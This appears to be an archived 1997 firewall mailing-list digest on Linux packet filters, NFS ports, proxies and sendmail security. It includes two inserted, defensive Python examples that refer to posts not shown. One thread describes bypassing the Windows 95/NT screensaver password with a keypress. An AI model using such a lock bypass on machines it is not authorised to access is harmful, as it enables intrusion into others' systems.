I received xdma_gw.c from xingtech. Then I compiled xdma_gw.c. When I loaded
xdma_gw at the command line, I got a bind error on the input socket:
"address is already used". How can I load xdma_gw? I tried it with the
parameters -p 1558 -x 1558, but it failed.
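Gene Lee's point earlier in this digest (a "polite" SMTP relay records the host it received the message from, so an internal hostname ends up in the headers of outbound mail without any breach) can be turned into a routine check on mail leaving a site. The following is an added example, not code from any of the posts; the sample message, its hosts and addresses are constructed, and the internal zone suffix .corp.internal is an assumption.

```python
"""Flag internal hostnames and RFC 1918 addresses leaking in Received: headers.

Added example (not from the original posts). The sample message below is
constructed: hosts, addresses and queue ids are made up.
"""
import email
import ipaddress
import re

# Constructed sample: an internal workstation hands mail to the bastion,
# which hands it to the ISP. Each relay records the host it accepted the
# message from, so the inside hostname and 192.168.x address travel with it.
SAMPLE_MESSAGE = (
    "Received: from bastion.example.com (bastion.example.com [198.51.100.7])\n"
    "\tby mx.isp.example (8.8.4/8.8.4) with ESMTP id AAA00001;\n"
    "\tMon, 13 Jan 1997 14:33:19 -0800 (PST)\n"
    "Received: from phi.corp.internal (phi.corp.internal [192.168.10.5])\n"
    "\tby bastion.example.com (8.8.4/8.8.4) with SMTP id BAA00002;\n"
    "\tMon, 13 Jan 1997 14:32:08 -0800 (PST)\n"
    "From: someone@example.com\n"
    "To: bruce@example.net\n"
    "Subject: test\n"
    "\n"
    "hello\n"
)

# Assumption: the site's internal DNS zone is .corp.internal; names ending in
# it should never be visible outside the firewall.
INTERNAL_SUFFIXES = (".corp.internal",)

# RFC 1918 blocks, checked explicitly rather than via ipaddress.is_private,
# which also matches documentation ranges such as 198.51.100.0/24.
RFC1918_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# "from <helo> (<reverse-dns> [<ip>]) by <relay> ..." as sendmail-style MTAs write it
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)"
    r"(?:\s+\((?P<rdns>[^\s\[\]()]*)\s*\[(?P<ip>[^\]]+)\]\))?"
    r"\s+by\s+(?P<by>\S+)",
    re.IGNORECASE,
)


def parse_received(value):
    """Return the hosts named in one Received: header, or None if unparseable."""
    flat = " ".join(value.split())          # unfold continuation lines
    m = RECEIVED_RE.search(flat)
    if m is None:
        return None
    return {k: (v or "") for k, v in m.groupdict().items()}


def is_rfc1918(text):
    """True if text is an IPv4 address inside one of the RFC 1918 blocks."""
    try:
        addr = ipaddress.ip_address(text)
    except ValueError:
        return False
    return any(addr in net for net in RFC1918_NETS)


def is_internal_name(host):
    """True if the hostname belongs to the internal zone (case-insensitive)."""
    return host.lower().rstrip(".").endswith(INTERNAL_SUFFIXES)


def find_leaks(raw_message):
    """Return (hop, field, value, reason) tuples for every internal name or
    address found in the message's Received: chain. Hop 0 is the outermost
    (most recently added) header."""
    msg = email.message_from_string(raw_message)
    leaks = []
    for hop, value in enumerate(msg.get_all("Received", [])):
        hosts = parse_received(value)
        if hosts is None:
            continue
        for field in ("helo", "rdns", "by"):
            if hosts[field] and is_internal_name(hosts[field]):
                leaks.append((hop, field, hosts[field], "internal hostname"))
        if is_rfc1918(hosts["ip"]):
            leaks.append((hop, "ip", hosts["ip"], "RFC 1918 address"))
    return leaks


if __name__ == "__main__":
    # Three findings, all on hop 1 (the bastion's record of the internal
    # sender): the helo name, the reverse-DNS name and the 192.168.10.5 address.
    for hop, field, value, reason in find_leaks(SAMPLE_MESSAGE):
        print(f"hop {hop}: {field}={value} ({reason})")
```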
From firewalls-owner Mon Jan 13 20:29:33 1997
Date: Mon, 13 Jan 1997 23:00:17 -0500 (EST)
From: Todd Graham Lewis
To: "Hicks, Rick"
cc: "'Firewalls List'"
Subject: RE: LINUX RedHat

We're running a RedHat-based system here as a packet filter with no problem.
One of our proxy servers is also a Linux box, but Debian rather than RedHat.
Both work equally well. There are no especial drawbacks, so long as you
understand how to use the immutable bit, etc.

__
Todd Graham Lewis                Linux!                Core Engineering
Mindspring Enterprises   tlewis@mindspring.com   (800) 719 4664, x2804

On Mon, 13 Jan 1997, Hicks, Rick wrote:

> >I would appreciate hearing from anyone who has successfully installed a
> >PC-based firewall in a LINUX RedHat environment. We have adopted LINUX
> >RedHat for our company and would prefer the TIS FW Toolkit or some other
> >similar product, although I know BSD OS is recommended most often. I
> >recall reading an EMAIL message on this forum sometime back about a
> >person who charges $2,000 to install TIS FW Toolkit. Perhaps that person
> >has had some experience with RedHat and would like to share his/her
> >knowledge as to what FW would best configure with LINUX RedHat.
>
> I have been running a 'firewall' on Linux (RedHat) for almost a year now
> without any problems.
> I used parts of the TIS kit and other things:
> caching proxy, Real Audio proxy, scan detectors, Tripwire, etc..
> However, I don't think the issue is whether I can run this correctly;
> it's whether YOU can run this correctly. To be using the TIS toolkit you
> should know how to compile and configure programs yourself, and know
> about Internet security issues and how each piece of the firewall handles
> them. The kit was not intended, and is licensed accordingly, to be
> installed by people for money; it is intended to be a kit for security
> professionals to use and improve upon.
>
> If you feel comfortable with your security knowledge and compiling and
> configuring programs, then give the kit a try. If you are looking for
> someone to set up a firewall for you, you will need to purchase a
> commercial firewall.
>
> Rick
>
> ____________________________________________
> Rick Hicks
> Network Specialist
> Hussmann Corporation
> RHicks@Hussmann.com
> http://www.hussmann.com

From firewalls-owner Mon Jan 13 21:31:25 1997
Date: Mon, 13 Jan 1997 22:57:43 -0600 (CST)
From: "John C. Hayward"
To: Firewalls@GreatCircle.COM
Subject: Privileged Ports for NFS and Ultrix

Dear Firewallers,

I've posted this question to the Ultrix newsgroup but did not get a reply.
I'm hoping that someone on this list can provide some insight.

We have an Ultrix machine which is an NFS server for other machines. We have
a security problem in that a rogue user program on the other machines can
mount NFS from the server. This can be done by a user-level program without
any special privileges.

Ultrix has a program called nfsportmon with which you can turn on port
monitoring for NFS. This restricts NFS activity to those connections which
come from a privileged (512-1023?) port on the client.

With NetBSD clients it works just as it should. There is a -P flag on the
mount command which makes it use only a privileged port to connect to the
server. If the Ultrix server has monitoring on, NFS activity stops except on
those mounts made with the -P flag.

However, with Ultrix and Sun clients there appears to be no flag to tell the
client to mount from privileged ports. Furthermore, it appears that once the
mount from Ultrix clients has been made without port monitoring on, turning
on port monitoring does not stop NFS activity.

Any suggestions on how to get Ultrix clients to behave properly with
nfsportmon on? The server is Ultrix 4.4 and the clients are 4.2 and 4.5.

Thanks in advance.
John.C.Hayward@wheaton.edu
johnh...
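Todd Graham Lewis's "Ethernet hardware addresses" post earlier in this digest shows a MAC address being changed in three commands; since the address cannot serve as authentication, the realistic defensive use of it is change detection on the segment, in the style of arpwatch. The following is an added example, not code from any post or tool; the "timestamp ip mac" observation format and the addresses in the sample log are constructed for this example.

```python
"""Detect Ethernet address changes on a segment, arpwatch-style.

Added example (not from the original posts). It consumes a constructed log of
ARP observations; the "timestamp ip mac" line format is an assumption made
for this example, not any tool's real output.
"""
import re
from collections import namedtuple

Observation = namedtuple("Observation", "when ip mac")
Event = namedtuple("Event", "when kind ip old_mac new_mac")

# Constructed sample: the station at 192.168.1.10 switches from the address
# Todd's transcript started with to the one he set, then flips back and forth.
# The last line is deliberately malformed to show it being skipped.
SAMPLE_LOG = """\
1997-01-13T17:30:00 192.168.1.10 00:A0:24:81:A7:44
1997-01-13T17:30:05 192.168.1.11 00:60:08:12:34:56
1997-01-13T17:42:00 192.168.1.10 00:a0:24:81:a7:45
1997-01-13T17:42:30 192.168.1.10 00:A0:24:81:A7:44
1997-01-13T17:43:00 192.168.1.10 00:A0:24:81:A7:45
1997-01-13T17:44:00 192.168.1.12 not-a-mac
"""

MAC_RE = re.compile(r"^(?:[0-9a-f]{2}:){5}[0-9a-f]{2}$")


def normalize_mac(text):
    """Canonical lower-case colon form of a MAC, or None if it is malformed."""
    mac = text.strip().lower().replace("-", ":")
    return mac if MAC_RE.match(mac) else None


def parse_log(text):
    """Turn log lines into Observation records, dropping lines that do not parse."""
    observations = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        when, ip, raw_mac = parts
        mac = normalize_mac(raw_mac)
        if mac is None:
            continue
        observations.append(Observation(when, ip, mac))
    return observations


class ArpWatch:
    """Tracks which MAC each IP is bound to and reports changes.

    kinds: "new station"              first time the IP is seen
           "changed ethernet address" IP moved to a MAC never seen for it before
           "flip flop"                IP moved back to a MAC seen for it earlier
    """

    def __init__(self):
        self.current = {}   # ip -> MAC currently bound
        self.history = {}   # ip -> every MAC ever seen for it

    def observe(self, obs):
        """Record one observation; return an Event if it changes the picture."""
        seen = self.history.setdefault(obs.ip, set())
        old = self.current.get(obs.ip)
        if old is None:
            kind = "new station"
        elif old == obs.mac:
            return None                     # steady state, nothing to report
        elif obs.mac in seen:
            kind = "flip flop"
        else:
            kind = "changed ethernet address"
        seen.add(obs.mac)
        self.current[obs.ip] = obs.mac
        return Event(obs.when, kind, obs.ip, old, obs.mac)


def watch(text):
    """Run the whole log through a fresh ArpWatch and return the events."""
    watcher = ArpWatch()
    events = (watcher.observe(o) for o in parse_log(text))
    return [e for e in events if e is not None]


if __name__ == "__main__":
    # Two "new station" events, one "changed ethernet address", two "flip flop".
    for e in watch(SAMPLE_LOG):
        print(f"{e.when} {e.kind}: {e.ip} {e.old_mac} -> {e.new_mac}")
```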
From firewalls-owner Mon Jan 13 21:37:16 1997
Date: Tue, 14 Jan 1997 00:10:36 -0500
From: "Steve@hon.com"
To: firewalls@GreatCircle.com
CC: blitton@directs.com
Subject: Re: Question

blitton@directs.com wrote:
>
> Can someone please tell me where I can find a list of port numbers and
> process assigned to it. ie port 80 => http, port 443 => shttp.
>
> I am especially interested in what port number is assigned to snmp.
>
> Thanks in advance and sorry if this is off topic.
>
> bruce

Bruce,

Posts that do not have the word firewall in at least one paragraph are off
topic ;)

If you are running NT (Win95?), look in \winnt\system32\drivers\etc for the
file 'services'. It lists port numbers and associated services. Not sure
about the location for *nix, os/2, BSD etc..but a search should find it if
you have tcp/ip installed.
Steve
Steve@hon.com

From firewalls-owner Mon Jan 13 22:56:44 1997
Date: Tue, 14 Jan 1997 00:48:09 -0500
From: "Steve@hon.com"
To: firewalls@GreatCircle.com
Subject: SOCKS for Firewall

Hi,

I have been looking at NEC's SOCKS server program for possible use as a
firewall on a small LAN. All IPs on the LAN are in the 192.168.0.0 network
address range, which I think I read somewhere is invisible to the Internet.
Could someone advise me on its use under these circumstances? I am running
NT 4.0 as server and several WfW clients.
Thanks,
galip@vnet.net

From firewalls-owner Mon Jan 13 22:59:29 1997
Date: Tue, 14 Jan 1997 14:56:24 -0800
To: firewalls@greatcircle.com, sneakers@CS.YALE.EDU
From: PaLaN
Subject: WIN'95 FLAW

Howdy,

I just encountered a security flaw (I would call it that) in the M$
Windows'95 screensaver!! I don't know if any of you have encountered this or
not, but here it goes:

If the Windows'95 screen saver is active, you can break in without any
password and all you have to do is press the "windows" logo key (printed on
the M$ keyboard) and there you are. If you don't have a M$ keyboard, press
the ALT+ESC keys to get access.

I have tried this with my own PC and my friends'. It works.....try on your
own PC.

Hmmm....M$ still the "King Of Buggy" err...I don't intend to flame M$ here
ok..! Let me know if any of you have encountered this. I'm going to send M$
a mail on this bug but before that, I need to know whether any patch is
available for this...thx.
rgds,
PaLaN

From firewalls-owner Tue Jan 14 00:11:51 1997
From: dtosic@delta.Tymnet.COM (Dragan Tosic)
Subject: Re: Question
To: blitton@directs.com
Date: Mon, 13 Jan 1997 23:42:40 -0800 (PST)
Cc: firewalls@greatcircle.com

>
> Can someone please tell me where I can find a list of port numbers and
> process assigned to it. ie port 80 => http, port 443 => shttp.
>

Hi there,

yes I can tell you :-)

Point your favourite browser to:

ftp://ftp.isi.edu/in-notes/iana/assignments/port-numbers

Hope this helps

D.B.Tosic
Germany

> I am especially interested in what port number is assigned to snmp.
>
> Thanks in advance and sorry if this is off topic.
>
> bruce
>

From firewalls-owner Tue Jan 14 03:20:36 1997
Date: Tue, 14 Jan 1997 10:50:25 +0100
From: "Stefan Berg"
To: firewalls@GreatCircle.com
Subject: POP Proxy?

Hi,

I am looking for a nice little POP proxy that does just about the same thing
as the fwtk FTP-proxy: users should be able to check mail outside my proxy
by using, i.e., mailuser@mailhost.com. Could someone point me in the right
direction?
Best regards,
/Stefan

From firewalls-owner Tue Jan 14 05:20:55 1997
Date: Tue, 14 Jan 1997 12:17:20 +0100
From: plavin@crisa.es (Pilar Lavin Mera)
To: firewalls@greatcircle.com
Subject: TIS FWtk + netscape

Hello all,

I'm new to this kind of list and I don't know whether my question is
appropriate or not, but ... I would appreciate any help.

My company has a network accessing the Internet through a SUN Sparc Station
+ Solaris 2.3 and we have installed the TIS FW toolkit. Our problem is that
we cannot configure netscape to pass through the ftp-proxy. Can anyone help
us?

Thanks in advance,
Pilar.
plavin@crisa.es

From firewalls-owner Tue Jan 14 05:44:55 1997
Date: Tue, 14 Jan 1997 06:34:05 -0500
To: blitton@directs.com
From: Paul Ferguson
Subject: Re: Question
Cc: firewalls@GreatCircle.COM

See: RFC1700.

- paul

At 05:41 PM 1/13/97 -0600, blitton@directs.com wrote:
> Can someone please tell me where I can find a list of port numbers and
> process assigned to it. ie port 80 => http, port 443 => shttp.
>
> I am especially interested in what port number is assigned to snmp.
>
> Thanks in advance and sorry if this is off topic.
>
> bruce
>

--
Paul Ferguson
Consulting Engineering
Herndon, Virginia USA
tel: +1.703.397.5938
e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Tue Jan 14 06:30:33 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA29155 for firewalls-outgoing; Tue, 14 Jan 1997 05:40:33 -0800 (PST) Received: from firewall1_int.glaxowellcome.com (firewall1.glaxowellcome.com [192.58.204.204]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA29116 for ; Tue, 14 Jan 1997 05:40:04 -0800 (PST) Received: by firewall1_int.glaxowellcome.com id IAA27852; Tue, 14 Jan 1997 08:46:45 -0500 (EST) Received: from ussun2f.glaxo.com(152.51.19.71) by firewall1.glaxo.com via smap (3.2) id xma027845; Tue, 14 Jan 97 08:46:20 -0500 Received: by ussun2f.glaxo.com id IAA10580; Tue, 14 Jan 1997 08:43:14 -0500 (EST) Date: Tue, 14 Jan 1997 08:43:13 -0500 (EST) From: Gary Hull X-Sender: ggh14854@ussun2f To: PaLaN cc: firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU Subject: Re: WIN'95 FLAW In-Reply-To: <3.0.32.19970114145623.006882b0@202.190.59.4> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 14 Jan 1997, PaLaN wrote: > If the Windows'95 Screen saver is active, you can break into without any > password and all you have to do is : press the "windows" logo key (printed > on the M$ keyboard) and there you are. Yes, I have experienced this as well with many systems running Win95. |/ ---o0o-@@-o0o--------- Gary G. Hull - Technical Consultant Howard Systems International - Glaxo Wellcome Inc. 
Five Moore Drive - Raleigh, North Carolina 27709 Tel : (919) 941-4867 - Fax : (919) 483-0056 email: ggh14854@ussun2f.glaxo.com From firewalls-owner Tue Jan 14 06:46:25 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA29350 for firewalls-outgoing; Tue, 14 Jan 1997 05:44:11 -0800 (PST) Received: from telco.com (mail.telco.com [192.190.11.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA29338 for ; Tue, 14 Jan 1997 05:43:53 -0800 (PST) Received: from fod.telco.com ([129.200.3.100]) by firewall.telco.com with SMTP id <77188>; Tue, 14 Jan 1997 08:37:05 -0500 Received: from Norwood-Message_Server by fod.telco.com with Novell_GroupWise; Tue, 14 Jan 1997 08:42:10 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Tue, 14 Jan 1997 08:41:01 -0500 From: John LaMoureux To: sneakers@CS.YALE.EDU, palan@dataprep.com.my, firewalls@GreatCircle.COM Subject: WIN'95 FLAW -Reply Mime-Version: 1.0 Content-Type: text/plain Content-Disposition: inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Unfortunately, this flaw can be found in M$ Windows NT as well, both SERVER and WORKSTATION (it works with any screen saver, even those that do not ship with the product.) I would also be interested in any known patch or fix, as I just started deploying NT throughout my enterprise! >>> PaLaN 01/14/97 05:56pm >>> Howdy, I juz encountered a security (I would call it) flaw in M$ Windows'95 screensaver !! I don't know anyone of you encountered this or not but here it goes : If the Windows'95 Screen saver is active, you can break into without any password and all you have to do is : press the "windows" logo key (printed on the M$ keyboard) and there you are. If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have tried this with my own PC and my friends. It works.....try on your own PC. Hmmm....M$ still the "King Of Buggy" err...I don't intend to flame M$ here ok..!
Let me know if anyone of you encountered this. I'm going to send M$ a mail on this bug but before that, I need to know whether any patch is available for this...thx. rgds, PaLaN From firewalls-owner Tue Jan 14 06:59:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA20219 for firewalls-outgoing; Tue, 14 Jan 1997 01:29:25 -0800 (PST) Received: from hitel.kol.net (hitel.kol.co.kr [204.252.145.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA20201 for ; Tue, 14 Jan 1997 01:29:12 -0800 (PST) Received: from jangca2.kcc.com (pppm80.kol.co.kr [204.252.145.180]) by hitel.kol.net (8.6.9H1/8.6.9) with SMTP id SAA29398; Tue, 14 Jan 1997 18:27:57 +0900 Message-ID: <32DC40B0.18FB@hitel.kol.net> Date: Tue, 14 Jan 1997 18:28:00 -0800 From: sklee Reply-To: klbcardl@hitel.kol.co.kr X-Mailer: Mozilla 3.0 (Win95; I; 16bit) MIME-Version: 1.0 To: PaLaN CC: firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU Subject: Re: WIN'95 FLAW References: <3.0.32.19970114145623.006882b0@202.190.59.4> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk PaLaN wrote: > > Howdy, > > I juz encountered a security (I would call it) flaw in M$ Windows'95 > screensaver !! I don't know anyone of you encountered this or not but here > it goes : > > If the Windows'95 Screen saver is active, you can break into without any > password and all you have to do is : press the "windows" logo key (printed > on the M$ keyboard) and there you are. > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > tried this with my own PC and my friends. It works.....try on your own PC. > > Hmmm....M$ still the "King Of Buggy" err...I don't intend to flame M$ here > ok..! Let me know if anyone of you encountered this. > > I'm going to send M$ a mail on this bug but before that, I need to know > whether any patch is available for this...thx. > > rgds, > PaLaN Good !!!!!
M$ is a crazy boy..... I tried that: I started the screen saver, pressed Ctrl+Alt+Delete, and killed the screen saver .... it was killed...:-) This is a great bug!! sklee From firewalls-owner Tue Jan 14 07:15:31 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA22084 for firewalls-outgoing; Tue, 14 Jan 1997 01:49:08 -0800 (PST) Received: from extol.com.my (mail.extol.com.my [202.185.238.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id BAA22042 for ; Tue, 14 Jan 1997 01:48:05 -0800 (PST) Received: by portal.extol.com.my id <21893>; Wed, 15 Jan 1997 01:58:09 +0800 Message-Id: <97Jan15.015809gmt+0800.21893@portal.extol.com.my> Date: Wed, 15 Jan 1997 01:02:44 +0800 From: pclow Reply-To: pclow@pc.jaring.my X-Sender: pclow X-Mailer: Mozilla 4.0b1 (Win95; I) MIME-Version: 1.0 To: PaLaN CC: firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU Subject: Re: WIN'95 FLAW X-Priority: Normal References: <3.0.32.19970114145623.006882b0@202.190.59.4> Content-Type: multipart/alternative; boundary="----------702F30E570807" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------702F30E570807 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Palan, I suggest that you do your "research" very carefully before posting. Flame throwers do exist on this list. pc -- What is man that thou art mindful of him? PaLaN wrote: > I juz encountered a security (I would call it) flaw in M$ Windows'95 > screensaver !! I don't know anyone of you encountered this or not but here > it goes : > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > tried this with my own PC and my friends. It works.....try on your own PC.
------------702F30E570807-- From firewalls-owner Tue Jan 14 08:27:12 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA20848 for firewalls-outgoing; Tue, 14 Jan 1997 01:34:00 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id BAA20767 for ; Tue, 14 Jan 1997 01:33:14 -0800 (PST) Message-Id: <199701140933.BAA20767@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA277024326; Tue, 14 Jan 1997 20:32:07 +1100 From: Darren Reed Subject: Re: Secure firewall with only Linux-Kernel filtering possible? To: adam@homeport.org (Adam Shostack) Date: Tue, 14 Jan 1997 20:32:06 +1100 (EDT) Cc: Ryan.Russell@sybase.com, rammeri@winternet.co.at, firewalls@GreatCircle.COM In-Reply-To: <199701140202.VAA16636@homeport.org> from "Adam Shostack" at Jan 13, 97 09:02:10 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't want to throw cold water on the qmail authors' enthusiasm, but a reality check on this comparison seems needed. It is excellent to see someone is doing this but I can't see sendmail fading out of the picture any time soon. In some mail from Adam Shostack, sie said: > > qmail sendmail > ----- -------- > 210k tar.gz 900k tar.gz How many lines of code? The sendmail .tar.gz comes with a _lot_ of other things such as scripts for easy building of sendmail.cf, sample sendmail.cf's, etc. > one setuid (qmail) one (root) setuid program One setuid program is one too many. > designed for security designed to handle complex mail, > like uucp/smtp/chaos I'm sure others *must* have asked this question: how do you use sendmail in conjunction with qmail so you can handle all the various complexities which are found in today's Internet? > many small confusing one famously painful config file > config files "famously painful" - it is _much_ better than it was.
Personally, I would prefer to have one config file (the FWTK has one - netperm-table - but many small programs) rather than try to configure many things to interact correctly. Why doesn't someone write a sendmail.cf -> qmail configuration converter and then compare? > release of the month club bug of the month club > (soon to hit v1.0) Bug of the month/release of the month - which do you go for? They're both bad (but could be worse). It does mean they both receive attention, which is good. Not being v1.0 means, to me, it is a young product that has a long way to go before it matures. > (no security holes) Correction: no known security holes (yet). Darren From firewalls-owner Tue Jan 14 08:35:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA29970 for firewalls-outgoing; Tue, 14 Jan 1997 05:57:43 -0800 (PST) Received: from lotus.lotus.com (lotus.com [192.233.136.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA29939 for ; Tue, 14 Jan 1997 05:57:23 -0800 (PST) From: Martin_Khoo/SIN/Lotus%LOTUSINT@crd.lotus.com Received: from internet2.lotus.com by lotus.lotus.com (SMI-8.6/SMI-SVR4) id IAA15559; Tue, 14 Jan 1997 08:52:51 -0500 Received: from mta2.lotus.com by internet2.lotus.com (5.x/SMI-SVR4) id AA03553; Tue, 14 Jan 1997 08:49:13 -0500 Received: by mta2.lotus.com(Lotus SMTP MTA v1.05 (274.9 11-27-1996)) id 8525641F.004C95D0 ; Tue, 14 Jan 1997 08:56:30 -0400 X-Lotus-Fromdomain: LOTUSINT@LOTUS@MTA To: pichel@sdm.de Cc: firewalls@greatcircle.com Message-Id: <4825641F.00052211.00@mta2.lotus.com> Date: Tue, 14 Jan 1997 09:01:40 +0900 Subject: Re: (fwd) Firewall-1 query Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk IMHO, I would think that you should not be running anything else on the firewall machine, and certainly NOT sendmail !! I would recommend that you have a separate machine as the mail server running on the DMZ instead.
As far as FW-1 is concerned it will allow SMTP traffic to pass so long as your rule-base says so; it does not do any content filtering; at least not for V2.1. TIS Gauntlet has an SMTP proxy (SMPAD) that you may want to take a look at. cheers! Martin Khoo pichel@sdm.de on 01/13/97 09:15:26 PM Please respond to pichel@sdm.de To: firewalls@greatcircle.com cc: (bcc: Martin Khoo/SIN/Lotus) Subject: Re: (fwd) Firewall-1 query > On Thu, 10 Oct 1996 07:01:50 +0100 (BST), Jon Whitton wrote: > > > >I have been looking at firewall-1 as a security solution and have one > >major query. > > > >It appears to work at the IP layer and basically allows or denies packets > >depending on certain rules. (This is only from the Checkpoint web site.) > > > >My question is how does this secure say sendmail since sendmail will be > >running directly on the firewall machine and not a proxy. > >Surely if sendmail is running on the firewall then when (not if!) a new > >bug is found in sendmail, this bug can just be exploited on the firewall. FW-1 doesn't secure sendmail in its protocol layer (smtp). It just restricts who can speak smtp to whom. This _is_ insecure regarding SMTP, of course. Use smapd from TIS-FWTK (for free) or wait for Firewall-1 Release 3.0 which comes with content security (filters SMTP commands and viruses). Jörg! -- Jörg Pichel |s |d &|m | software design & management | | | | GmbH & Co. KG | | | | Thomas-Dehler-Str.
27 joerg.pichel@sdm.de | | | | 81737 Muenchen Tel/FAX: (089) 63812-112/150 From firewalls-owner Tue Jan 14 08:48:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA27267 for firewalls-outgoing; Tue, 14 Jan 1997 04:50:57 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA27247 for ; Tue, 14 Jan 1997 04:50:32 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vk8JT-0004HuC (Debian Smail-3.2 1996-Jul-4 #2); Tue, 14 Jan 1997 13:49:59 +0100 (MET) Received: from lina.inka.de (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Tue, 14 Jan 97 13:49 MET Received: by lina.inka.de id m0vk7pb-0004igC (Debian Smail-3.2 1996-Jul-4 #2); Tue, 14 Jan 1997 13:19:07 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: Secure firewall with only Linux-Kernel filtering To: rammeri@winternet.co.at Date: Tue, 14 Jan 1997 13:19:06 +0100 (MET) Cc: armin@data.tops.net, firewalls@GreatCircle.COM In-Reply-To: <199701140147.CAA06124@winternet.co.at> from "Ingo Rammer" at Jan 14, 97 02:47:05 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, > but there's still a little question running around in the depths of > my brain .. that's .. what are the advantages of, say > altavista-firewall or fw-1 compared to a linux box ... as I know the > i/o system of a sun f.e. is worse than the linux's.... so ....is it > because of > *) greater security? Linux's Kernel Firewalling is stateless. This means some Packets may slip through. Dynamic Filter Rules for ftp-data or other protocols are not supported. This is no issue if you run ip-masquerade, but then you will need to install additional incoming application proxies.
> *) greater flexibility? I can't compare this to FW1, but for Linux you have all the source. > *) graphic setup? This is probably a problem with Linux. You need to know what you are doing. But since this is always the case for a firewall operator, a GUI may DECREASE security of your firewall. There are some graphical setup tools for Linux. There is even a new firewall which is stateful, called "sf firewall" with dynamic rules and more. This will only support 2 interfaces right now, but IMHO it has all the features needed for filtering. There is a gui for ip-masquerade, too. > *) throughput? Have no comparison for that, but since PC boxes are much cheaper, you can throw a lot of hardware at the problem with Linux. > *) having someone to blame, if it doesn't work? That's probably your biggest problem. You may need to get a consultant for your Linux installation and blame her. > but anyway .. I hope it is fairly secure ,) That's the last word before someone is hacked :) Hope that helps... BTW: does anybody have the current prices for a FW1 system including software (not the lite Version) in Europe? Greetings Bernd -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( ..
) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From firewalls-owner Tue Jan 14 08:52:21 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA29998 for firewalls-outgoing; Tue, 14 Jan 1997 05:58:32 -0800 (PST) Received: from lotus.lotus.com (lotus.com [192.233.136.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA29977 for ; Tue, 14 Jan 1997 05:58:09 -0800 (PST) From: Martin_Khoo/SIN/Lotus%LOTUSINT@crd.lotus.com Received: from internet2.lotus.com by lotus.lotus.com (SMI-8.6/SMI-SVR4) id IAA15785; Tue, 14 Jan 1997 08:54:37 -0500 Received: from mta2.lotus.com by internet2.lotus.com (5.x/SMI-SVR4) id AA03649; Tue, 14 Jan 1997 08:51:01 -0500 Received: by mta2.lotus.com(Lotus SMTP MTA v1.05 (274.9 11-27-1996)) id 8525641F.004CC0BA ; Tue, 14 Jan 1997 08:58:20 -0400 X-Lotus-Fromdomain: LOTUSINT@LOTUS@MTA To: drexx@sunphil.mozcom.com Cc: firewalls@greatcircle.com Message-Id: <4825641F.0006778C.00@mta2.lotus.com> Date: Tue, 14 Jan 1997 09:15:06 +0900 Subject: Re: TIS FWTK and Solstice FW-1 arguing Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Have you looked at the netperm table setting on the TIS toolkit that specifies the setting for the ftp-proxy? My guess is that it is probably not set up to allow FTP (since you mentioned that bypassing it makes FTP work). What kind of error message did you get when you tried to do FTP? Another place to look is the FW-1 log. If you did not even see an entry there for the FTP connection then 